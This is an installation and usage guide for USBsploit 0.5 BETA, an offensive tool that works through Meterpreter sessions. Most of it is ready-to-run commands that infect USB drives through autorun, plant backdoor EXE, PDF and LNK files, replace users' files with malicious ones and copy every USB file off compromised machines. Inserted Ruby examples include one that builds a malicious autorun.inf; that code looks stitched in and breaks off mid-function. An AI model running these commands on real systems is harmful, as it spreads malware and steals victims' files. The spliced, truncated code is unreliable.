How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit

By Xavier Poli, secuobs.com
14//2010


Summary: PoC to generate reverse TCP backdoors and malicious PDF or LNK files, but also to run Auto[run|play] infections and to dump all USB files remotely from multiple targets at the same time; a set of extensions to dump can be specified. All EXE, PDF and LNK files on the USB targets can also be replaced by malicious ones. USBsploit works through Meterpreter sessions (wmic, Railgun, migration) with a lightly modified version of Metasploit. The interface is a mod of SET (The Social-Engineer Toolkit). The Meterpreter scripts of the USBsploit Framework can also be used with the original Metasploit Framework.



The most recent version of USBsploit is currently 0.6 BETA.

Report bugs to https://twitter.com/secuobs or to xavier.poli@infratech.fr (recommended for privacy-sensitive reports; KeyID: 0x3A3D555A, fingerprint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A, xpo.asc).

The usbsploit.rb script has issues when used with the default Ruby version of BackTrack 4; installing Ruby 1.9.1 fixes them. Include the following details in bug reports: the Python version, the Ruby version, the Metasploit version if used, the OS of the targets, the OS of the listener, the hardware details of the targets, of the listener and of the USB drives, the security solutions installed on the targets and on the listener, any particular firewall configuration on the targets and on the listener, the VMware (or other hypervisor) version if used, the last file of the Dump configuration, the stage at which the bug appeared, the global USBsploit options if changed, the output of the high-verbosity scan and the output of USBsploit.

To use USBsploit you need the same dependencies ( link ) as the Metasploit Framework and SET. Two checks are worth making before running any of the installers below: the SVN server presents a self-signed certificate, so compare the fingerprint shown in the svn prompt with the one reproduced in the transcripts here (80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e) before answering (p); and the SHA-1 sums listed next to the archives are served by the same site as the archives themselves, so they catch a truncated or corrupted download but not a substituted one.

Installation of 0.5 BETA through SVN ( link )

root:~# svn -q co https://svn.secuobs.com/svn
Error validating server certificate for 'https://svn.secuobs.com:443':
 - The certificate is not issued by a trusted authority. Use the
   fingerprint to validate the certificate manually!
Certificate information:
 - Hostname: svn.secuobs.com
 - Valid: from Fri, 09 Jul 2010 15:00:30 GMT until Mon, 06 Jul 2020 15:00:30 GMT
 - Issuer: XPO, SECUOBS, PARIS, IDF, FR
 - Fingerprint: 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)eject, accept (t)emporarily or accept (p)ermanently? p
root:~# cd svn/
root:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/svn# cd ../
root:~# rm -fr svn
root:~# usbsploit


Installation through usbsploit-0.5-BETA-linux-i686.run ( link )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.run
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.run
614c321553a4de2bc7843aafa4ce926b232595ef usbsploit-0.5-BETA-linux-i686.run
root:~# sh usbsploit-0.5-BETA-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root:~# rm -fr usbsploit
root:~# usbsploit
The USBsploit Framework 0.5 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Error validating server certificate for 'https://svn.secuobs.com:443':
 - The certificate is not issued by a trusted authority. Use the
   fingerprint to validate the certificate manually!
Certificate information:
 - Hostname: svn.secuobs.com
 - Valid: from Fri, 09 Jul 2010 15:00:30 GMT until Mon, 06 Jul 2020 15:00:30 GMT
 - Issuer: XPO, SECUOBS, PARIS, IDF, FR
 - Fingerprint: 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)eject, accept (t)emporarily or accept (p)ermanently? p


Installation through usbsploit-0.5-BETA-linux-i686.tar.gz ( link )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# cd usbsploit
root:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/usbsploit# cd ../
root:~# rm -fr usbsploit/
root:~# usbsploit
The USBsploit Framework 0.5 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Error validating server certificate for 'https://svn.secuobs.com:443':
 - The certificate is not issued by a trusted authority. Use the
   fingerprint to validate the certificate manually!
Certificate information:
 - Hostname: svn.secuobs.com
 - Valid: from Fri, 09 Jul 2010 15:00:30 GMT until Mon, 06 Jul 2020 15:00:30 GMT
 - Issuer: XPO, SECUOBS, PARIS, IDF, FR
 - Fingerprint: 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)eject, accept (t)emporarily or accept (p)ermanently? p


Installation of usbsploit.rb 0.5 BETA working with the original Metasploit Framework ( link )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Get some help

meterpreter > bgrun usbsploit -h

- Always use Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -d

- Always use Railgun, even if wmic is available on the target. Launch a Dump attack only on files matching the predefined set of extensions with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -e /opt/metasploit3/msf3/data/textextensions -t

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/EXE USB infection attack with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Always use Railgun, even if wmic is available on the target. Launch both the Auto[run|play]/EXE USB infection and the all-files dumping attack with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Always use Railgun, even if wmic is available on the target. Launch both the Auto[run|play]/EXE USB infection and the file dumping attack (only on files matching the predefined set of extensions) with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/LNK USB infection attack with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/PDF USB infection attack with high verbosity in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -p

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/EXE USB infection and the all-files dumping attack with high verbosity in an infinite loop. Also replace all the EXE, PDF and LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -a -d

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/PDF USB infection and the all-files dumping attack with high verbosity in an infinite loop. Also replace all the EXE, PDF and LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -p -d

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/LNK USB infection and the all-files dumping attack with high verbosity in an infinite loop. Also replace all the EXE, PDF and LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -l -d

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/EXE USB infection and the file dumping attack (only on files matching the predefined set of extensions) with high verbosity in an infinite loop. Also replace all the EXE files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -g -a -e /opt/metasploit3/msf3/data/textextensions -t

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/PDF USB infection and the file dumping attack (only on files matching the predefined set of extensions) with high verbosity in an infinite loop. Also replace all the PDF files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -g -p -e /opt/metasploit3/msf3/data/textextensions -t

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/LNK USB infection and the file dumping attack (only on files matching the predefined set of extensions) with high verbosity in an infinite loop. Also replace all the LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -g -l -e /opt/metasploit3/msf3/data/textextensions -t

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/LNK USB infection with high verbosity in an infinite loop. Also replace all the LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -g -l

- Always use Railgun, even if wmic is available on the target. Launch the Auto[run|play]/LNK USB infection with high verbosity in an infinite loop. Also replace all the EXE, PDF and LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun usbsploit -s explorer.exe -q -c -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -o -l

Just remove the "-v" switch to deactivate the high verbosity, and the "-c" switch if you want to use wmic when it is available on the target (automatically falling back to Railgun if not). If you drop "-s explorer.exe -q", migration is not activated.
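The Auto[run|play]/EXE, /PDF and /LNK attacks above all rest on the same mechanism: an autorun.inf uploaded to the root of each USB drive (the -i switch), next to the launched file (-n/-b, -f/-r or -m/-k) and the icon (-j), which Windows XP AutoPlay reads to decide what to run when the stick is plugged into the next machine. The Ruby below is an added example, not USBsploit code: it builds the kind of autorun.inf such an infection relies on (constructed content, not the project's own template) and, for the defender, extracts every directive in a given autorun.inf that AutoPlay would execute, so a mounted drive can be checked for this class of implant.

```ruby
# Added example, not part of USBsploit: build the autorun.inf an
# Auto[run|play] infection relies on, and inspect one for launch directives.
# The file content is constructed for illustration; USBsploit's own
# autorun.inf template is not reproduced here.

# Produce an autorun.inf that launches `launch_name` (an EXE, PDF or LNK
# dropped next to it) and shows `icon_name` for the drive. Windows XP
# AutoPlay honours `open`, `shellexecute` and `shell\<verb>\command`;
# `action` only labels the entry in the AutoPlay dialog.
def build_autorun_inf(launch_name, icon_name, action: "Open folder to view files")
  lines = ["[autorun]",
           "icon=#{icon_name}",
           "action=#{action}",
           "open=#{launch_name}",
           "shellexecute=#{launch_name}"]
  lines.join("\r\n") + "\r\n"
end

# Keys whose value AutoPlay will execute or hand to ShellExecute.
LAUNCH_KEYS = %w[open shellexecute].freeze

# Return every launch target found in the [autorun] section of an
# autorun.inf. Section and key names are case-insensitive, comments start
# with ';', and `shell\<verb>\command` entries count as launch directives.
def autorun_launch_targets(content)
  section = nil
  targets = []
  content.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(";")
    if (m = line.match(/\A\[(.+)\]\z/))
      section = m[1].strip.downcase
      next
    end
    next unless section == "autorun"
    key, value = line.split("=", 2)
    next if value.nil?
    key = key.strip.downcase
    if LAUNCH_KEYS.include?(key) || key.match?(/\Ashell\\[^\\]+\\command\z/)
      targets << value.strip
    end
  end
  targets
end

# A drive is suspect if its autorun.inf would launch anything at all: a
# file that only sets `icon` or `label` is cosmetic, one with `open`,
# `shellexecute` or a shell verb command is an execution vector.
def autorun_suspect?(content)
  !autorun_launch_targets(content).empty?
end

if __FILE__ == $PROGRAM_NAME
  inf = build_autorun_inf("usbsploitbackdoor.exe", "autorun.ico")
  puts inf
  puts "launch targets: #{autorun_launch_targets(inf).inspect}"
end
```

To check a stick on the listener, read the autorun.inf from the mount point and pass its content to autorun_suspect?; the function deliberately ignores [other] sections and comment lines so that a benign label-only file is not reported.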


Installation of the split 0.5 BETA scripts dump_usbsploit.rb, autorun_usbsploit.rb and replace_usbsploit.rb working with the original Metasploit Framework ( link )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.5-BETA-linux-i686.tar.gz
6ea0c951282775a6eb764333a3c95ae94bba5c71 usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.5-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/autorun_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/dump_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/split_meterpreter_scripts/replace_usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Always use Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity in an infinite loop. Protect the dumped files from being overwritten by the malicious ones uploaded via autorun_usbsploit.rb and/or replace_usbsploit.rb. Migrate to explorer.exe

meterpreter > bgrun dump_usbsploit -s explorer.exe -q -v -c -d -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -p all

- Always use Railgun, even if wmic is available on the target. Launch a Dump attack on all files with high verbosity in an infinite loop. Only protect the dumped EXE files from being overwritten by the malicious ones uploaded via autorun_usbsploit.rb and/or replace_usbsploit.rb. Migrate to explorer.exe

meterpreter > bgrun dump_usbsploit -s explorer.exe -q -v -c -d -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -p exe

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/EXE USB infection in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -a exe

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/LNK USB infection in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploit.lnk -b /opt/usbsploit/lib/msf/data/usbsploit.lnk -a lnk

- Always use Railgun, even if wmic is available on the target. Launch an Auto[run|play]/PDF USB infection in an infinite loop. Migrate to explorer.exe

meterpreter > bgrun autorun_usbsploit -s explorer.exe -q -v -c -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -n usbsploit.pdf -b /opt/usbsploit/lib/msf/data/usbsploit.pdf -a pdf

- Always use Railgun, even if wmic is available on the target. Replace all the EXE, PDF and LNK files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun replace_usbsploit -s explorer.exe -q -c -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -f usbsploit.pdf -r /opt/usbsploit/lib/msf/data/usbsploit.pdf -o all

- Always use Railgun, even if wmic is available on the target. Replace all the EXE files on the USB targets with malicious ones. Migrate to explorer.exe

meterpreter > bgrun replace_usbsploit -s explorer.exe -q -c -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -o exe

Just remove the "-v" switch to deactivate the high verbosity, and the "-c" switch if you want to use wmic when it is available on the target (automatically falling back to Railgun if not). If you drop "-s explorer.exe -q", migration is not activated.

USBsploit resources:

- Video - USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the original files
- Video - USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- Video - usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- Video - usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced through Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video: USBsploit 0.4 BETA: Auto[run|play]/PDF USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.4 in Metasploit, Auto[run|play]/PDF USB infection and files dumping through Meterpreter
- How to install USBsploit v0.4b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.3 BETA: Auto[run|play]/LNK USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.3 in Metasploit, Auto[run|play]/LNK USB infection and files dumping through Meterpreter
- How to install USBsploit v0.3b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.2 BETA: Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 and the original Metasploit Framework, Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: USBsploit 0.2 BETA: both USB files dumping and Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 in Metasploit, both Auto[run|play]/EXE USB infection and files dumping through Meterpreter sessions
- How to install USBsploit v0.2b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit gets all the remote USB files through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: USBsploit gets all the remote USB files filtered by extensions through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter sessions
- Video: usbsploit.rb and the original MSF to get all the remote USB files filtered by extensions through Meterpreter sessions
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework

Changelog:

USBsploit V0.6b:

- Adds an option to the replacement module that first tries to upload an infected version of the original USB files. Only for PDF and EXE files; LNK files are always replaced by a generic malicious one. If embedding the payload into a custom copy of the original fails, a generic malicious file is used to replace the EXE or PDF. It can be used alone or with any Auto[run|play] infection, but not with a single dump (all or by extension) attack. It is useful when the targets do not have Auto[run|play] activated. Can be used with USBsploit or with the original Metasploit Framework via the provided usbsploit.rb script. Also supported in the 3 split Meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb).
- Offers a CLI to automate the creation of the malicious files and the launch of the listeners. The IP, payload, encoder, count, port, attacks, replacing, template for PDF embedding and PDF type options can be specified via switches on the command line. If nothing is specified for an option, the default value is used. All the combinations were tested with an internal fuzzing tool and appear to work.
- Offers an internal Metasploit core updated to the latest SVN version (metasploit v3.7.0-dev svn r12145 2011.03.26).

USBsploit V0.5b:

- Integrates an EXE, PDF and LNK USB replacement module. It can be used alone or with any Auto[run|play] infection, but not with a single dump (all files or by extension) attack. It is useful when the targets do not have Auto[run|play] enabled.
- Offers an option to replace only the files matching the Auto[run|play] USB infection in use: with Auto[run|play]/exe all the EXE files can be replaced, likewise PDF files with Auto[run|play]/pdf and LNK files with Auto[run|play]/lnk.
- Now uses railgun with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW() when wmic is not available on the target (XP HOME).
- An option forces railgun (GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW()) to always be used, even when wmic is available on the target (XP PRO).
- In addition to the single usbsploit.rb script, three independent Ruby Meterpreter scripts are now offered (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb). dump_usbsploit.rb has an option to protect already dumped files from being overwritten when a file previously uploaded by replace_usbsploit.rb or autorun_usbsploit.rb is dumped again. Every script can be used with the latest original Metasploit Framework (all the options work with 3.5.1-dev).
- Offers an internal Metasploit core updated to the latest SVN revision (v3.5.1-dev svn r11223, 2010-12-04).
- Adds Adobe FlateDecode Stream Predictor 02 Integer Overflow to the list of MSF FileFormat attacks.
- Minor improvements and some bug fixes, for instance when a non-default path is given for the file listing the extensions to dump.
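The two removable-drive discovery paths described in the 0.5b entries (parsing wmic output, and the GetLogicalDrives / GetDriveType pair called through railgun when wmic is missing) as an added example in plain Ruby, not USBsploit's own code. The wmic text and the drive-type table in demo_removable_drives are constructed samples; in a real Meterpreter script the mask and the per-drive types would come from client.railgun.kernel32.GetLogicalDrives and GetDriveTypeW instead of the table.

```ruby
# Added example, not USBsploit's code. Everything below runs offline: the
# wmic output and the drive-type table are constructed samples standing in
# for railgun calls against a live Meterpreter session.

# Drive types returned by the Win32 GetDriveType API (winbase.h).
DRIVE_UNKNOWN     = 0
DRIVE_NO_ROOT_DIR = 1
DRIVE_REMOVABLE   = 2
DRIVE_FIXED       = 3
DRIVE_REMOTE      = 4
DRIVE_CDROM       = 5
DRIVE_RAMDISK     = 6

# GetLogicalDrives returns a 32-bit mask: bit 0 is A:, bit 1 is B:, and so on.
def letters_from_mask(mask)
  (0...26).select { |bit| mask[bit] == 1 }.map { |bit| "#{('A'.ord + bit).chr}:" }
end

# Keep only the drives GetDriveType reports as DRIVE_REMOVABLE. drive_type is
# a callable taking "E:" and returning the integer the API would return, so
# the same function works with a railgun call or with a constructed table.
def removable_from_mask(mask, drive_type)
  letters_from_mask(mask).select { |d| drive_type.call(d) == DRIVE_REMOVABLE }
end

# Parse the output of `wmic logicaldisk where drivetype=2 get deviceid`.
# Only lines beginning with a drive letter are kept, which skips the header
# row and the localized "no instances" message whatever its language (wmic
# prints CRLF lines padded with trailing spaces, hence the strip).
def removable_from_wmic(output)
  output.each_line.map(&:strip).select { |l| l.match?(/\A[A-Z]:/) }.map { |l| l[0, 2] }
end

# Constructed demo: C: fixed, D: CD-ROM, E: removable, so mask bits 2..4 set.
def demo_removable_drives
  types  = { 'C:' => DRIVE_FIXED, 'D:' => DRIVE_CDROM, 'E:' => DRIVE_REMOVABLE }
  lookup = ->(d) { types.fetch(d, DRIVE_UNKNOWN) }
  wmic_sample = "DeviceID  \r\nE:        \r\n\r\n"
  {
    all:       letters_from_mask(0b11100),
    railgun:   removable_from_mask(0b11100, lookup),
    wmic:      removable_from_wmic(wmic_sample),
    wmic_none: removable_from_wmic("No Instance(s) Available.\r\n")
  }
end

puts demo_removable_drives.inspect if __FILE__ == $0
```

The point of taking drive_type as a callable is that the filtering logic is testable without a session; swapping in `->(d) { client.railgun.kernel32.GetDriveTypeW(d + "\\")['return'] }` is the only change needed inside a Meterpreter script.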

USBsploit V0.4b:

- Integrates an Auto[run|play]/PDF USB infection module with various attacks (Adobe CoolType SING Table 'uniqueName' Overflow, Adobe Flash Player 'newfunction' Invalid Pointer Use, Adobe Collab.collectEmailInfo Buffer Overflow, Adobe Collab.getIcon Buffer Overflow, Adobe JBIG2Decode Memory Corruption Exploit, Adobe PDF Embedded EXE Social Engineering, Adobe util.printf() Buffer Overflow, Adobe U3D CLODProgressiveMeshDeclaration Array Overrun, Adobe PDF Embedded EXE Social Engineering (NOJS)).
- Offers an option to run both the Auto[run|play]/PDF USB infection and the USB file dumping attack on the same target.
- Offers a Ruby Meterpreter script (usbsploit.rb) compatible with the latest original Metasploit Framework (all the options work with 3.5.1-dev). A bug (reported to the MSF team) seems to exist in this version of MSF (not in the previous 3.4.2-dev): when exit -y is used while a session is active and an InitialAutorunScript was used (finished or not), the session has to be killed with sessions -K before exit or exit -y. The USBsploit Framework therefore stays based on 3.4.2-dev for the moment to avoid this issue.

USBsploit V0.3b:

- Was tested on a GNU/Linux operating system with Python 2.6.5 and Ruby 1.9.1.
- Integrates an Auto[run|play]/LNK USB infection module. The generation of the LNK file, of the autorun.inf and the rest of the process are split but share some random values so that they work together.
- Offers to launch a LNK listener (distinct from the one handling the USB infection) to receive the connect-back from the USB drives infected with the last LNK file generated.
- Also offers a full console on this listener, including all the Metasploit features except the exploits, payloads, encoders and nops. Those have to be added manually if you want to use them (copy them from a classic Metasploit installation into lib/msf/modules in the USBsploit installation tree). Database support can be enabled or disabled on this console.
- Offers an internal Metasploit core updated to the latest SVN version (v3.4.2-dev).
- Adds support for the French output of the wmic commands.
- Offers an option to run both the Auto[run|play]/LNK USB infection and the USB file dumping attack on the same target.
- Offers a Ruby Meterpreter script (usbsploit.rb) compatible with the latest original Metasploit Framework (all the options work with 3.4.2-dev).

USBsploit V0.2b:

- Integrates the Auto[run|play]/EXE USB infection module.
- Offers an option to run both the Auto[run|play]/EXE infection and the file dumping attack on the same target.
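The Auto[run|play]/EXE, /PDF and /LNK infections listed across the 0.2b to 0.5b entries all leave an autorun.inf on the key and only fire where the host still honours it. What follows is an added, defender-side example (not USBsploit's code) that triages both halves: it parses an autorun.inf for the directives that launch something, and checks a NoDriveTypeAutoRun policy value against the removable-drive bit. The autorun.inf text and the two policy values in the demo are constructed; on a real host the DWORD lives under HKLM or HKCU \Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.

```ruby
# Added example, not USBsploit's code. Sample autorun.inf and policy values
# are constructed so the triage runs offline.

# Directives in the [autorun] section that make Explorer run something.
LAUNCH_KEYS = %w[open shellexecute].freeze

# Minimal autorun.inf parser: returns the [autorun] section as a hash with
# lower-cased keys; other sections and ';' comment lines are ignored.
def parse_autorun(text)
  section = nil
  entries = {}
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';')
    if (m = line.match(/\A\[(.+)\]\z/))
      section = m[1].downcase
    elsif section == 'autorun' && line.include?('=')
      key, value = line.split('=', 2)
      entries[key.strip.downcase] = value.strip
    end
  end
  entries
end

# Returns one [directive, value, note] triple per suspicious entry.
def autorun_findings(text)
  entries = parse_autorun(text)
  findings = []
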